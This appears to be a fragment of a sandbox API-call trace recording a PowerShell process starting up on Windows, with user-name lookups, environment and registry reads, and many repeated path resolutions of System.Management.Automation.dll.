	[0494.755] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22dbb8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22dbb8) returned 0x1
	[0495.538] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0495.538] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0495.538] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22dbf8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22dbf8) returned 1
	[0495.538] CoTaskMemFree (pv=0x3b9bb0) 
	[0495.540] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d35148*="Available", lpRawData=0x2d34ed8) returned 1
	[0496.318] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0496.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.318] CoTaskMemFree (pv=0x1b39cff0) 
	[0496.320] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0496.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.320] CoTaskMemFree (pv=0x1b39cff0) 
	[0496.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.326] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0496.326] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0496.326] CoTaskMemFree (pv=0x1b39cff0) 
	[0496.326] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0496.326] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0496.327] CoTaskMemFree (pv=0x1b39cff0) 
	[0496.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.329] GetCurrentProcessId () returned 0xf38
	[0496.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dbd8 | out: phkResult=0x22dbd8*=0x378) returned 0x0
	[0496.333] RegQueryValueExW (in: hKey=0x378, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db5c, lpData=0x0, lpcbData=0x22db58*=0x0 | out: lpType=0x22db5c*=0x1, lpData=0x0, lpcbData=0x22db58*=0x56) returned 0x0
	[0496.333] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a6f70
	[0496.333] RegQueryValueExW (in: hKey=0x378, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22db2c, lpData=0x1b3a6f70, lpcbData=0x22db28*=0x56 | out: lpType=0x22db2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22db28*=0x56) returned 0x0
	[0496.334] CoTaskMemFree (pv=0x1b3a6f70) 
	[0496.334] RegCloseKey (hKey=0x378) returned 0x0
	[0496.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.341] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0496.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.341] CoTaskMemFree (pv=0x1b39cff0) 
	[0496.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
